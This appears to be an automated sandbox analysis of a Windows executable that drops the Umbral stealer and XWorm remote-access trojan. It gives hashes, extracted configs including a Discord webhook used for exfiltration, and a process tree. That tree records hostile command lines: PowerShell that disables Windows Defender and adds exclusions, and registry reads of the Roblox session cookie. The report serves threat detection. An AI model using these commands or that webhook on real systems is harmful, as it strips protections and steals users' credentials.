umbral | 9af8b897f56f1b73c8111b9c7a47038606dd385c03e452500b5b8e24bf115a83

Analysis

max time kernel
149s
max time network
126s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
10-07-2024 20:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Astro-V15.3.exe
Size

102.0MB
MD5

4febea6c84e05008393647554b5ba483
SHA1

eb327e8b6e66c0ac91e52c5a773ccc6ef594cf1a
SHA256

ad6e27a94edf7e7c54a78b009d944dbc0b7068cb6ef2804f6e038f3db5d76d01
SHA512

b93db0dc591d156faa2f3a18a55e081473db8b04ae5477a1fc620708d66bfe405c62fb84e64b68bc988dad9239d4916ad83d2233933c8ec570fbb57f896d9d1d
SSDEEP

3145728:qz//2lnX6Me2PxaqomQ/Od2eLIkEMCJkT5pv+:k3knqdOq+nUkLC2p

Score

10^/10

umbral xworm execution rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

3.0

127.0.0.1:14289

Mutex

3fE1bhMQefjKxWsl

Attributes

Install_directory
%Userprofile%
install_file
USB.exe

aes.plain

Extracted

Family

umbral

https://discord.com/api/webhooks/1260204024884494396/XQNUro5TXjnsRYRYDN9BlltAdsJlmbEOCddhRxQnArV8Y5HIaQN634DB3DJUPNyTDMLd

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000016c83-19.dat	family_umbral
behavioral1/memory/536-38-0x0000000000CB0000-0x0000000000CF0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000001600d-5.dat	family_xworm
behavioral1/memory/2540-7-0x0000000001340000-0x0000000001350000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2012	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RunFirst.exe

Deletes itself 1 IoCs

pid	Process
1880	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xxxt - Copy.lnk	xxxt - Copy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xxxt - Copy.lnk	xxxt - Copy.exe

Executes dropped EXE 4 IoCs

pid	Process
2540	xxxt - Copy.exe
2936	RunSecond.exe
536	RunFirst.exe
2948	RunSecond.exe

Loads dropped DLL 5 IoCs

pid	Process
2184	Astro-V15.3.exe
2936	RunSecond.exe
2948	RunSecond.exe
1212	Process not Found
1212	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	discord.com
9	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
832	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1636	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1264	PING.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2540	xxxt - Copy.exe
536	RunFirst.exe
2012	powershell.exe
1572	powershell.exe
2884	powershell.exe
2640	powershell.exe
2928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	xxxt - Copy.exe
Token: SeDebugPrivilege	536	RunFirst.exe
Token: SeDebugPrivilege	2540	xxxt - Copy.exe
Token: SeIncreaseQuotaPrivilege	1816	wmic.exe
Token: SeSecurityPrivilege	1816	wmic.exe
Token: SeTakeOwnershipPrivilege	1816	wmic.exe
Token: SeLoadDriverPrivilege	1816	wmic.exe
Token: SeSystemProfilePrivilege	1816	wmic.exe
Token: SeSystemtimePrivilege	1816	wmic.exe
Token: SeProfSingleProcessPrivilege	1816	wmic.exe
Token: SeIncBasePriorityPrivilege	1816	wmic.exe
Token: SeCreatePagefilePrivilege	1816	wmic.exe
Token: SeBackupPrivilege	1816	wmic.exe
Token: SeRestorePrivilege	1816	wmic.exe
Token: SeShutdownPrivilege	1816	wmic.exe
Token: SeDebugPrivilege	1816	wmic.exe
Token: SeSystemEnvironmentPrivilege	1816	wmic.exe
Token: SeRemoteShutdownPrivilege	1816	wmic.exe
Token: SeUndockPrivilege	1816	wmic.exe
Token: SeManageVolumePrivilege	1816	wmic.exe
Token: 33	1816	wmic.exe
Token: 34	1816	wmic.exe
Token: 35	1816	wmic.exe
Token: SeIncreaseQuotaPrivilege	1816	wmic.exe
Token: SeSecurityPrivilege	1816	wmic.exe
Token: SeTakeOwnershipPrivilege	1816	wmic.exe
Token: SeLoadDriverPrivilege	1816	wmic.exe
Token: SeSystemProfilePrivilege	1816	wmic.exe
Token: SeSystemtimePrivilege	1816	wmic.exe
Token: SeProfSingleProcessPrivilege	1816	wmic.exe
Token: SeIncBasePriorityPrivilege	1816	wmic.exe
Token: SeCreatePagefilePrivilege	1816	wmic.exe
Token: SeBackupPrivilege	1816	wmic.exe
Token: SeRestorePrivilege	1816	wmic.exe
Token: SeShutdownPrivilege	1816	wmic.exe
Token: SeDebugPrivilege	1816	wmic.exe
Token: SeSystemEnvironmentPrivilege	1816	wmic.exe
Token: SeRemoteShutdownPrivilege	1816	wmic.exe
Token: SeUndockPrivilege	1816	wmic.exe
Token: SeManageVolumePrivilege	1816	wmic.exe
Token: 33	1816	wmic.exe
Token: 34	1816	wmic.exe
Token: 35	1816	wmic.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeIncreaseQuotaPrivilege	2636	wmic.exe
Token: SeSecurityPrivilege	2636	wmic.exe
Token: SeTakeOwnershipPrivilege	2636	wmic.exe
Token: SeLoadDriverPrivilege	2636	wmic.exe
Token: SeSystemProfilePrivilege	2636	wmic.exe
Token: SeSystemtimePrivilege	2636	wmic.exe
Token: SeProfSingleProcessPrivilege	2636	wmic.exe
Token: SeIncBasePriorityPrivilege	2636	wmic.exe
Token: SeCreatePagefilePrivilege	2636	wmic.exe
Token: SeBackupPrivilege	2636	wmic.exe
Token: SeRestorePrivilege	2636	wmic.exe
Token: SeShutdownPrivilege	2636	wmic.exe
Token: SeDebugPrivilege	2636	wmic.exe
Token: SeSystemEnvironmentPrivilege	2636	wmic.exe
Token: SeRemoteShutdownPrivilege	2636	wmic.exe
Token: SeUndockPrivilege	2636	wmic.exe
Token: SeManageVolumePrivilege	2636	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2540	xxxt - Copy.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 2540	2184	Astro-V15.3.exe	31
PID 2184 wrote to memory of 2540	2184	Astro-V15.3.exe	31
PID 2184 wrote to memory of 2540	2184	Astro-V15.3.exe	31
PID 2184 wrote to memory of 2936	2184	Astro-V15.3.exe	32
PID 2184 wrote to memory of 2936	2184	Astro-V15.3.exe	32
PID 2184 wrote to memory of 2936	2184	Astro-V15.3.exe	32
PID 2184 wrote to memory of 536	2184	Astro-V15.3.exe	33
PID 2184 wrote to memory of 536	2184	Astro-V15.3.exe	33
PID 2184 wrote to memory of 536	2184	Astro-V15.3.exe	33
PID 2184 wrote to memory of 1880	2184	Astro-V15.3.exe	34
PID 2184 wrote to memory of 1880	2184	Astro-V15.3.exe	34
PID 2184 wrote to memory of 1880	2184	Astro-V15.3.exe	34
PID 1880 wrote to memory of 832	1880	cmd.exe	36
PID 1880 wrote to memory of 832	1880	cmd.exe	36
PID 1880 wrote to memory of 832	1880	cmd.exe	36
PID 2936 wrote to memory of 2948	2936	RunSecond.exe	37
PID 2936 wrote to memory of 2948	2936	RunSecond.exe	37
PID 2936 wrote to memory of 2948	2936	RunSecond.exe	37
PID 536 wrote to memory of 1816	536	RunFirst.exe	38
PID 536 wrote to memory of 1816	536	RunFirst.exe	38
PID 536 wrote to memory of 1816	536	RunFirst.exe	38
PID 536 wrote to memory of 1028	536	RunFirst.exe	41
PID 536 wrote to memory of 1028	536	RunFirst.exe	41
PID 536 wrote to memory of 1028	536	RunFirst.exe	41
PID 536 wrote to memory of 2012	536	RunFirst.exe	43
PID 536 wrote to memory of 2012	536	RunFirst.exe	43
PID 536 wrote to memory of 2012	536	RunFirst.exe	43
PID 536 wrote to memory of 1572	536	RunFirst.exe	45
PID 536 wrote to memory of 1572	536	RunFirst.exe	45
PID 536 wrote to memory of 1572	536	RunFirst.exe	45
PID 536 wrote to memory of 2884	536	RunFirst.exe	47
PID 536 wrote to memory of 2884	536	RunFirst.exe	47
PID 536 wrote to memory of 2884	536	RunFirst.exe	47
PID 536 wrote to memory of 2640	536	RunFirst.exe	49
PID 536 wrote to memory of 2640	536	RunFirst.exe	49
PID 536 wrote to memory of 2640	536	RunFirst.exe	49
PID 536 wrote to memory of 2636	536	RunFirst.exe	51
PID 536 wrote to memory of 2636	536	RunFirst.exe	51
PID 536 wrote to memory of 2636	536	RunFirst.exe	51
PID 536 wrote to memory of 2736	536	RunFirst.exe	53
PID 536 wrote to memory of 2736	536	RunFirst.exe	53
PID 536 wrote to memory of 2736	536	RunFirst.exe	53
PID 536 wrote to memory of 1768	536	RunFirst.exe	55
PID 536 wrote to memory of 1768	536	RunFirst.exe	55
PID 536 wrote to memory of 1768	536	RunFirst.exe	55
PID 536 wrote to memory of 2928	536	RunFirst.exe	57
PID 536 wrote to memory of 2928	536	RunFirst.exe	57
PID 536 wrote to memory of 2928	536	RunFirst.exe	57
PID 536 wrote to memory of 1636	536	RunFirst.exe	59
PID 536 wrote to memory of 1636	536	RunFirst.exe	59
PID 536 wrote to memory of 1636	536	RunFirst.exe	59
PID 536 wrote to memory of 2676	536	RunFirst.exe	61
PID 536 wrote to memory of 2676	536	RunFirst.exe	61
PID 536 wrote to memory of 2676	536	RunFirst.exe	61
PID 2676 wrote to memory of 1264	2676	cmd.exe	63
PID 2676 wrote to memory of 1264	2676	cmd.exe	63
PID 2676 wrote to memory of 1264	2676	cmd.exe	63

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1028	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Astro-V15.3.exe
"C:\Users\Admin\AppData\Local\Temp\Astro-V15.3.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Users\Admin\AppData\Local\Temp\xxxt - Copy.exe
  "C:\Users\Admin\AppData\Local\Temp\xxxt - Copy.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2540
- C:\Users\Admin\AppData\Local\Temp\RunSecond.exe
  "C:\Users\Admin\AppData\Local\Temp\RunSecond.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Users\Admin\AppData\Local\Temp\RunSecond.exe
    "C:\Users\Admin\AppData\Local\Temp\RunSecond.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2948
- C:\Users\Admin\AppData\Local\Temp\RunFirst.exe
  "C:\Users\Admin\AppData\Local\Temp\RunFirst.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RunFirst.exe"
    3⤵
    - Views/modifies file attributes
    PID:1028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RunFirst.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2736
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2928
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1636
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RunFirst.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:1264
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat""
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RunFirst.exe

Filesize
232KB

MD5
f8739f5e5dc45a8293640ed3a16e37e4

SHA1
ea6d2a89a731f6ba7c251ba2f837cb8d85ba1cf5

SHA256
4bb0e6c8175d2e14881a7a03f43b0cbe32fb906f5761b37cdb8564e07694f631

SHA512
111a6804a49eb172e03ed95fb4dccf35abf18aa1a6b1b7314c98ccf36bb1b5df8dc9c525a297f14dfeea25843065fdc0fb94c4fe2a504e32e7f67fe722a31f06

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat

Filesize
163B

MD5
cbd1138b8b220722a68979a48c4d363f

SHA1
21885fd284766bbb616869027e03c9b1c9de88ca

SHA256
c78f9ed8e317690e7283ea4a9ec8e9bad293e1ee5f66aec0ac75fc629008f743

SHA512
a8e7be36e3250b0c907d629841aeb60cae65d9a4f4084082624fad500f65a60c772d4976f3a606d1d593fab2e6f925b040311fda938501e0ae005ab6cc3a2587

Download Submit
C:\Users\Admin\AppData\Local\Temp\xxxt - Copy.exe

Filesize
35KB

MD5
12af3b6e31055c3fb99d029d9ea50cce

SHA1
7a3a8e8d030ac1f16f774cc7a94ec2adb8d2aa83

SHA256
396c1941ee95bf8e9941ec6a3e53ee59dbc027bf9458495a2da8fc189c1d5dff

SHA512
a1611e164b6c267ff3fa1e474c98778e97797f145b77bf944b6d4e183cb1d93bb1a984e8e2f1736cb095ba7925ec1d2b99113e984333edbe28c33afae83f3b7d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b4b307ee05f0ab3da63b9ea324320b52

SHA1
c94d07582f547d42e2011ecf528fb37a27dabe2c

SHA256
1c08558be08e4281729b3e3f8a6a280b49a8882cb83c33a0f13e95502f5ec4d6

SHA512
60b6a8ada6db4f6179b71735af63c7b083e34ed04df328f8473f59e6a5ebb6bae5e7134fc9dc1bb3c0a2b1a96b1ec9e91fcba52eb9770eb250d3f1806add68b7

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI29362\python312.dll

Filesize
6.6MB

MD5
d521654d889666a0bc753320f071ef60

SHA1
5fd9b90c5d0527e53c199f94bad540c1e0985db6

SHA256
21700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2

SHA512
7a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3

Download Submit
memory/536-38-0x0000000000CB0000-0x0000000000CF0000-memory.dmp

Filesize
256KB

Download
memory/1572-1302-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/1572-1303-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2012-1295-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2012-1296-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2184-0-0x000007FEF5E43000-0x000007FEF5E44000-memory.dmp

Filesize
4KB

Download
memory/2184-8-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2184-94-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2184-1-0x00000000003B0000-0x00000000013B0000-memory.dmp

Filesize
16.0MB

Download
memory/2540-9-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2540-1204-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2540-7-0x0000000001340000-0x0000000001350000-memory.dmp

Filesize
64KB

Download
memory/2540-2588-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2540-2589-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp

Filesize
9.9MB

Download
memory/2928-1331-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2928-1332-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download